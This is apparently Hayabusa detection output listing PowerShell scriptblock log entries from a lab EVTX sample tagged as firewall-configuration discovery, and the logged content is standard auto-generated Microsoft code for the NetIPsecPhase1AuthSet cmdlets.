[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 